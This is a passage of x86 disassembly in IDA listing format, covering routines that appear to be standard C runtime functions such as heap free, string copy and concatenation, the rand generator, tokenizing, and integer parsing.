var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00429965 SIZE 0000004F BYTES
; FUNCTION CHUNK AT 004299BD SIZE 0000001E BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437418
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
test esi, esi
jz loc_4299CC
mov eax, dword_677004
cmp eax, 3
jnz short loc_429965
push 9
call sub_42DAEF
pop ecx
and [ebp+var_4], 0
push esi
call sub_42C8FA
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_42994D
push esi
push eax
call sub_42C925
pop ecx
pop ecx
loc_42994D: ; CODE XREF: sub_4298F2+50�j
or [ebp+var_4], 0FFFFFFFFh
call sub_42995C
cmp [ebp+var_1C], 0
jmp short loc_4299AD
sub_4298F2 endp
; =============== S U B R O U T I N E =======================================
sub_42995C proc near ; CODE XREF: sub_4298F2+5F�p
; DATA XREF: .text:00437420�o
push 9
call sub_42DB50
pop ecx
retn
sub_42995C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298F2
loc_429965: ; CODE XREF: sub_4298F2+36�j
cmp eax, 2
jnz short loc_4299BD
push 9
call sub_42DAEF
pop ecx
mov [ebp+var_4], 1
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
push esi
call sub_42D655
add esp, 0Ch
mov [ebp+var_24], eax
test eax, eax
jz short loc_4299A0
push eax
push [ebp+var_20]
push [ebp+var_28]
call sub_42D6AC
add esp, 0Ch
loc_4299A0: ; CODE XREF: sub_4298F2+9D�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4299B4
cmp [ebp+var_24], 0
loc_4299AD: ; CODE XREF: sub_4298F2+68�j
jnz short loc_4299CC
push [ebp+arg_0]
jmp short loc_4299BE
; END OF FUNCTION CHUNK FOR sub_4298F2
; =============== S U B R O U T I N E =======================================
sub_4299B4 proc near ; CODE XREF: sub_4298F2+B2�p
; DATA XREF: .text:0043742C�o
push 9
call sub_42DB50
pop ecx
retn
sub_4299B4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298F2
loc_4299BD: ; CODE XREF: sub_4298F2+76�j
push esi
loc_4299BE: ; CODE XREF: sub_4298F2+C0�j
push 0
push dword_677000
call dword_437214 ; RtlFreeHeap
loc_4299CC: ; CODE XREF: sub_4298F2+28�j
; sub_4298F2:loc_4299AD�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4298F2
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4299E0 proc near ; CODE XREF: sub_401990+66�p
; sub_401990+B4�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_429A94
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_429A0A
loc_4299FB: ; CODE XREF: sub_4299E0+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_429A3B
test edi, 3
jnz short loc_4299FB
loc_429A0A: ; CODE XREF: sub_4299E0+19�j
; sub_4299E0+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_429A0A
mov eax, [edi-4]
test al, al
jz short loc_429A48
test ah, ah
jz short loc_429A43
test eax, 0FF0000h
jz short loc_429A3E
test eax, 0FF000000h
jnz short loc_429A0A
loc_429A3B: ; CODE XREF: sub_4299E0+20�j
dec edi
jmp short loc_429A4B
; ---------------------------------------------------------------------------
loc_429A3E: ; CODE XREF: sub_4299E0+52�j
sub edi, 2
jmp short loc_429A4B
; ---------------------------------------------------------------------------
loc_429A43: ; CODE XREF: sub_4299E0+4B�j
sub edi, 3
jmp short loc_429A4B
; ---------------------------------------------------------------------------
loc_429A48: ; CODE XREF: sub_4299E0+47�j
sub edi, 4
loc_429A4B: ; CODE XREF: sub_4299E0+5C�j
; sub_4299E0+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_429A60
mov ebx, ecx
shr ecx, 2
jnz short loc_429AAC
jmp short loc_429A7C
; ---------------------------------------------------------------------------
loc_429A60: ; CODE XREF: sub_4299E0+75�j
; sub_4299E0+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_429A9A
mov [edi], dl
inc edi
dec ecx
jz short loc_429A90
test esi, 3
jnz short loc_429A60
mov ebx, ecx
shr ecx, 2
jnz short loc_429AAC
loc_429A7C: ; CODE XREF: sub_4299E0+7E�j
; sub_4299E0+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_429A90
loc_429A83: ; CODE XREF: sub_4299E0+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_429A92
dec ecx
jnz short loc_429A83
loc_429A90: ; CODE XREF: sub_4299E0+8B�j
; sub_4299E0+A1�j
mov [edi], cl
loc_429A92: ; CODE XREF: sub_4299E0+AB�j
pop ebx
pop esi
loc_429A94: ; CODE XREF: sub_4299E0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_429A9A: ; CODE XREF: sub_4299E0+85�j
; sub_4299E0+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_429AA4: ; CODE XREF: sub_4299E0+E4�j
; sub_4299E0+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_429A7C
loc_429AAC: ; CODE XREF: sub_4299E0+7C�j
; sub_4299E0+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_429AA4
test dl, dl
jz short loc_429A9A
test dh, dh
jz short loc_429AF8
test edx, 0FF0000h
jz short loc_429AE8
test edx, 0FF000000h
jnz short loc_429AA4
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_429AE8: ; CODE XREF: sub_4299E0+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_429AF8: ; CODE XREF: sub_4299E0+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4299E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429B03 proc near ; CODE XREF: sub_401990+22�p
; sub_401990+52�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_42DC7D
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_429B43
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_429B50
; ---------------------------------------------------------------------------
loc_429B43: ; CODE XREF: sub_429B03+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_42DB65
pop ecx
pop ecx
loc_429B50: ; CODE XREF: sub_429B03+3E�j
mov eax, esi
pop esi
leave
retn
sub_429B03 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_429B60 proc near ; CODE XREF: sub_401990+8�p
; sub_402CE9+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_429B80
loc_429B6C: ; CODE XREF: sub_429B60+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_429B6C
loc_429B80: ; CODE XREF: sub_429B60+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_429B60 endp
; =============== S U B R O U T I N E =======================================
sub_429B8F proc near ; CODE XREF: sub_401A77+9�p
; sub_401AF0+9�p ...
arg_0 = dword ptr 4
call sub_42E4EE
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_429B8F endp
; =============== S U B R O U T I N E =======================================
sub_429B9C proc near ; CODE XREF: sub_401A77+F�p
; sub_401A77+22�p ...
call sub_42E4EE
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_429B9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429BBE proc near ; CODE XREF: sub_401B6E+1F0�p
; sub_401B6E+27B�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_42DC7D
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_429BFD
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_429C0A
; ---------------------------------------------------------------------------
loc_429BFD: ; CODE XREF: sub_429BBE+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_42DB65
pop ecx
pop ecx
loc_429C0A: ; CODE XREF: sub_429BBE+3D�j
mov eax, esi
pop esi
leave
retn
sub_429BBE endp
; =============== S U B R O U T I N E =======================================
sub_429C0F proc near ; CODE XREF: sub_401E9E+79�p
; sub_401E9E+89�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
cmp word ptr [eax], 0
jz short loc_429C23
loc_429C1B: ; CODE XREF: sub_429C0F+12�j
inc ecx
inc ecx
cmp word ptr [ecx], 0
jnz short loc_429C1B
loc_429C23: ; CODE XREF: sub_429C0F+A�j
mov edx, [esp+arg_4]
push esi
loc_429C28: ; CODE XREF: sub_429C0F+26�j
mov si, [edx]
mov [ecx], si
inc ecx
inc ecx
inc edx
inc edx
test si, si
jnz short loc_429C28
pop esi
retn
sub_429C0F endp
; =============== S U B R O U T I N E =======================================
sub_429C39 proc near ; CODE XREF: sub_4097B9+373�p
; sub_4097B9+3E3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push esi
mov dx, [ecx]
lea esi, [eax+2]
mov [eax], dx
loc_429C4B: ; CODE XREF: sub_429C39+21�j
inc ecx
inc ecx
test dx, dx
jz short loc_429C5C
mov dx, [ecx]
mov [esi], dx
inc esi
inc esi
jmp short loc_429C4B
; ---------------------------------------------------------------------------
loc_429C5C: ; CODE XREF: sub_429C39+17�j
pop esi
retn
sub_429C39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429C5E proc near ; CODE XREF: sub_401F54+3A�p
; sub_401F54+53�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
call sub_42E4EE
push 8
mov [ebp+arg_4], eax
pop ecx
xor eax, eax
lea edi, [ebp+var_20]
push 7
rep stosd
pop edi
loc_429C7F: ; CODE XREF: sub_429C5E+3A�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_429C7F
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_429CA7
mov eax, [ebp+arg_4]
mov edx, [eax+18h]
loc_429CA7: ; CODE XREF: sub_429C5E+41�j
; sub_429C5E+67�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_429CC7
test al, al
jz short loc_429CC7
inc edx
jmp short loc_429CA7
; ---------------------------------------------------------------------------
loc_429CC7: ; CODE XREF: sub_429C5E+60�j
; sub_429C5E+64�j
mov ebx, edx
loc_429CC9: ; CODE XREF: sub_429C5E+89�j
mov al, [edx]
test al, al
jz short loc_429CED
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_429CE9
inc edx
jmp short loc_429CC9
; ---------------------------------------------------------------------------
loc_429CE9: ; CODE XREF: sub_429C5E+86�j
and byte ptr [edx], 0
inc edx
loc_429CED: ; CODE XREF: sub_429C5E+6F�j
mov eax, [ebp+arg_4]
pop edi
pop esi
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
and eax, ebx
pop ebx
leave
retn
sub_429C5E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_429D10 proc near ; CODE XREF: sub_401F54+2B�p
; sub_4020BA+92�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_429D93
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_429D34
shr ecx, 2
jnz short loc_429DA1
jmp short loc_429D55
; ---------------------------------------------------------------------------
loc_429D34: ; CODE XREF: sub_429D10+1B�j
; sub_429D10+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_429D62
test al, al
jz short loc_429D6A
test esi, 3
jnz short loc_429D34
mov ebx, ecx
shr ecx, 2
jnz short loc_429DA1
loc_429D50: ; CODE XREF: sub_429D10+8F�j
and ebx, 3
jz short loc_429D62
loc_429D55: ; CODE XREF: sub_429D10+22�j
; sub_429D10+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_429D8E
dec ebx
jnz short loc_429D55
loc_429D62: ; CODE XREF: sub_429D10+2B�j
; sub_429D10+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_429D6A: ; CODE XREF: sub_429D10+2F�j
test edi, 3
jz short loc_429D84
loc_429D72: ; CODE XREF: sub_429D10+72�j
mov [edi], al
inc edi
dec ecx
jz loc_429E06
test edi, 3
jnz short loc_429D72
loc_429D84: ; CODE XREF: sub_429D10+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_429DF7
loc_429D8B: ; CODE XREF: sub_429D10+7F�j
; sub_429D10+F4�j
mov [edi], al
inc edi
loc_429D8E: ; CODE XREF: sub_429D10+4D�j
dec ebx
jnz short loc_429D8B
pop ebx
pop esi
loc_429D93: ; CODE XREF: sub_429D10+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_429D99: ; CODE XREF: sub_429D10+A9�j
; sub_429D10+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_429D50
loc_429DA1: ; CODE XREF: sub_429D10+20�j
; sub_429D10+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_429D99
test dl, dl
jz short loc_429DEB
test dh, dh
jz short loc_429DE1
test edx, 0FF0000h
jz short loc_429DD7
test edx, 0FF000000h
jnz short loc_429D99
mov [edi], edx
jmp short loc_429DEF
; ---------------------------------------------------------------------------
loc_429DD7: ; CODE XREF: sub_429D10+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_429DEF
; ---------------------------------------------------------------------------
loc_429DE1: ; CODE XREF: sub_429D10+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_429DEF
; ---------------------------------------------------------------------------
loc_429DEB: ; CODE XREF: sub_429D10+AD�j
xor edx, edx
mov [edi], edx
loc_429DEF: ; CODE XREF: sub_429D10+C5�j
; sub_429D10+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_429E01
loc_429DF7: ; CODE XREF: sub_429D10+79�j
xor eax, eax
loc_429DF9: ; CODE XREF: sub_429D10+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_429DF9
loc_429E01: ; CODE XREF: sub_429D10+E5�j
and ebx, 3
jnz short loc_429D8B
loc_429E06: ; CODE XREF: sub_429D10+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_429D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429E0E proc near ; CODE XREF: sub_40222C+43�p
; sub_402CE9+27A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_4293A0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_42E5F5
add esp, 10h
leave
retn
sub_429E0E endp
; =============== S U B R O U T I N E =======================================
sub_429E42 proc near ; CODE XREF: sub_42C70D+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_429E59
add esp, 10h
retn
sub_429E42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429E59 proc near ; CODE XREF: sub_429E42+E�p
; sub_42A05E+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_429E71: ; CODE XREF: sub_429E59+46�j
cmp dword_4535C4, 1
jle short loc_429E89
movzx eax, bl
push 8
push eax
call sub_42F12B
pop ecx
pop ecx
jmp short loc_429E98
; ---------------------------------------------------------------------------
loc_429E89: ; CODE XREF: sub_429E59+1F�j
mov ecx, off_4533B8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_429E98: ; CODE XREF: sub_429E59+2E�j
test eax, eax
jz short loc_429EA1
mov bl, [esi]
inc esi
jmp short loc_429E71
; ---------------------------------------------------------------------------
loc_429EA1: ; CODE XREF: sub_429E59+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_429EAF
or [ebp+arg_C], 2
jmp short loc_429EB4
; ---------------------------------------------------------------------------
loc_429EAF: ; CODE XREF: sub_429E59+4E�j
cmp bl, 2Bh
jnz short loc_429EBA
loc_429EB4: ; CODE XREF: sub_429E59+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_429EBA: ; CODE XREF: sub_429E59+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_42A04E
cmp eax, 1
jz loc_42A04E
cmp eax, 24h
jg loc_42A04E
push 10h
test eax, eax
pop ecx
jnz short loc_429F02
cmp bl, 30h
jz short loc_429EEC
mov [ebp+arg_8], 0Ah
jmp short loc_429F1E
; ---------------------------------------------------------------------------
loc_429EEC: ; CODE XREF: sub_429E59+88�j
mov al, [esi]
cmp al, 78h
jz short loc_429EFF
cmp al, 58h
jz short loc_429EFF
mov [ebp+arg_8], 8
jmp short loc_429F1E
; ---------------------------------------------------------------------------
loc_429EFF: ; CODE XREF: sub_429E59+97�j
; sub_429E59+9B�j
mov [ebp+arg_8], ecx
loc_429F02: ; CODE XREF: sub_429E59+83�j
cmp [ebp+arg_8], ecx
jnz short loc_429F1E
cmp bl, 30h
jnz short loc_429F1E
mov al, [esi]
cmp al, 78h
jz short loc_429F16
cmp al, 58h
jnz short loc_429F1E
loc_429F16: ; CODE XREF: sub_429E59+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_429F1E: ; CODE XREF: sub_429E59+91�j
; sub_429E59+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_429F2E: ; CODE XREF: sub_429E59+16C�j
cmp dword_4535C4, 1
movzx esi, bl
jle short loc_429F46
push 4
push esi
call sub_42F12B
pop ecx
pop ecx
jmp short loc_429F51
; ---------------------------------------------------------------------------
loc_429F46: ; CODE XREF: sub_429E59+DF�j
mov eax, off_4533B8
mov al, [eax+esi*2]
and eax, 4
loc_429F51: ; CODE XREF: sub_429E59+EB�j
test eax, eax
jz short loc_429F5D
movsx ecx, bl
sub ecx, 30h
jmp short loc_429F8F
; ---------------------------------------------------------------------------
loc_429F5D: ; CODE XREF: sub_429E59+FA�j
cmp dword_4535C4, 1
jle short loc_429F71
push edi
push esi
call sub_42F12B
pop ecx
pop ecx
jmp short loc_429F7C
; ---------------------------------------------------------------------------
loc_429F71: ; CODE XREF: sub_429E59+10B�j
mov eax, off_4533B8
mov ax, [eax+esi*2]
and eax, edi
loc_429F7C: ; CODE XREF: sub_429E59+116�j
test eax, eax
jz short loc_429FCA
movsx eax, bl
push eax
call sub_42C278
pop ecx
mov ecx, eax
sub ecx, 37h
loc_429F8F: ; CODE XREF: sub_429E59+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_429FCA
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_429FB4
jnz short loc_429FAE
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_429FB4
loc_429FAE: ; CODE XREF: sub_429E59+147�j
or [ebp+arg_C], 4
jmp short loc_429FBD
; ---------------------------------------------------------------------------
loc_429FB4: ; CODE XREF: sub_429E59+145�j
; sub_429E59+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_429FBD: ; CODE XREF: sub_429E59+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_429F2E
; ---------------------------------------------------------------------------
loc_429FCA: ; CODE XREF: sub_429E59+125�j
; sub_429E59+139�j
mov eax, [ebp+arg_C]
dec [ebp+var_4]
mov ebx, [ebp+arg_4]
test al, 8
jnz short loc_429FE7
test ebx, ebx
jz short loc_429FE1
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_429FE1: ; CODE XREF: sub_429E59+180�j
and [ebp+var_8], 0
jmp short loc_42A032
; ---------------------------------------------------------------------------
loc_429FE7: ; CODE XREF: sub_429E59+17C�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_42A00B
test al, 1
jnz short loc_42A032
and eax, 2
jz short loc_42A002
cmp [ebp+var_8], 80000000h
ja short loc_42A00B
loc_42A002: ; CODE XREF: sub_429E59+19E�j
test eax, eax
jnz short loc_42A032
cmp [ebp+var_8], esi
jbe short loc_42A032
loc_42A00B: ; CODE XREF: sub_429E59+195�j
; sub_429E59+1A7�j
call sub_42F119
test byte ptr [ebp+arg_C], 1
mov dword ptr [eax], 22h
jz short loc_42A022
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_42A032
; ---------------------------------------------------------------------------
loc_42A022: ; CODE XREF: sub_429E59+1C1�j
mov eax, [ebp+arg_C]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_8], eax
loc_42A032: ; CODE XREF: sub_429E59+18C�j
; sub_429E59+199�j ...
test ebx, ebx
jz short loc_42A03B
mov eax, [ebp+var_4]
mov [ebx], eax
loc_42A03B: ; CODE XREF: sub_429E59+1DB�j
test byte ptr [ebp+arg_C], 2
jz short loc_42A049
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_42A049: ; CODE XREF: sub_429E59+1E6�j
mov eax, [ebp+var_8]
jmp short loc_42A059
; ---------------------------------------------------------------------------
loc_42A04E: ; CODE XREF: sub_429E59+66�j
; sub_429E59+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_42A057
mov [eax], edi
loc_42A057: ; CODE XREF: sub_429E59+1FA�j
xor eax, eax
loc_42A059: ; CODE XREF: sub_429E59+1F3�j
pop edi
pop esi
pop ebx
leave
retn
sub_429E59 endp
; =============== S U B R O U T I N E =======================================
sub_42A05E proc near ; CODE XREF: sub_402CE9+37A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_429E59
add esp, 10h
retn
sub_42A05E endp
; =============== S U B R O U T I N E =======================================
sub_42A075 proc near ; CODE XREF: sub_42A100+4�p
; sub_4339B6+1C1�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_42A07D: ; CODE XREF: sub_42A075+34�j
cmp dword_4535C4, 1
jle short loc_42A095
movzx eax, byte ptr [edi]
push 8
push eax
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42A0A4
; ---------------------------------------------------------------------------
loc_42A095: ; CODE XREF: sub_42A075+F�j
movzx eax, byte ptr [edi]
mov ecx, off_4533B8
mov al, [ecx+eax*2]
and eax, 8
loc_42A0A4: ; CODE XREF: sub_42A075+1E�j
test eax, eax
jz short loc_42A0AB
inc edi
jmp short loc_42A07D
; ---------------------------------------------------------------------------
loc_42A0AB: ; CODE XREF: sub_42A075+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_42A0BB
cmp esi, 2Bh
jnz short loc_42A0BF
loc_42A0BB: ; CODE XREF: sub_42A075+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_42A0BF: ; CODE XREF: sub_42A075+44�j
xor ebx, ebx
loc_42A0C1: ; CODE XREF: sub_42A075+7B�j
cmp dword_4535C4, 1
jle short loc_42A0D6
push 4
push esi
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42A0E1
; ---------------------------------------------------------------------------
loc_42A0D6: ; CODE XREF: sub_42A075+53�j
mov eax, off_4533B8
mov al, [eax+esi*2]
and eax, 4
loc_42A0E1: ; CODE XREF: sub_42A075+5F�j
test eax, eax
jz short loc_42A0F2
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_42A0C1
; ---------------------------------------------------------------------------
loc_42A0F2: ; CODE XREF: sub_42A075+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_42A0FB
neg eax
loc_42A0FB: ; CODE XREF: sub_42A075+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_42A075 endp
; =============== S U B R O U T I N E =======================================
sub_42A100 proc near ; CODE XREF: sub_402CE9+336�p
; sub_402CE9+344�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_42A075
pop ecx
retn
sub_42A100 endp
; =============== S U B R O U T I N E =======================================
sub_42A10B proc near ; CODE XREF: sub_4032D2+B0�p
; sub_40A9FE+4B46�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 40h
jz short loc_42A120
and dword ptr [esi+0Ch], 0
jmp short loc_42A137
; ---------------------------------------------------------------------------
loc_42A120: ; CODE XREF: sub_42A10B+D�j
push esi
call sub_42C1D4
push esi
call sub_42A13C
push esi
mov edi, eax
call sub_42C226
add esp, 0Ch
loc_42A137: ; CODE XREF: sub_42A10B+13�j
mov eax, edi
pop edi
pop esi
retn
sub_42A10B endp
; =============== S U B R O U T I N E =======================================
sub_42A13C proc near ; CODE XREF: sub_42A10B+1C�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 83h
jz short loc_42A17F
push esi
call sub_42F2D9
push esi
mov edi, eax
call sub_42F280
push dword ptr [esi+10h]
call sub_42F1A0
add esp, 0Ch
test eax, eax
jge short loc_42A16D
or edi, 0FFFFFFFFh
jmp short loc_42A17F
; ---------------------------------------------------------------------------
loc_42A16D: ; CODE XREF: sub_42A13C+2A�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_42A17F
push eax
call sub_4298F2
and dword ptr [esi+1Ch], 0
pop ecx
loc_42A17F: ; CODE XREF: sub_42A13C+D�j
; sub_42A13C+2F�j ...
and dword ptr [esi+0Ch], 0
mov eax, edi
pop edi
pop esi
retn
sub_42A13C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
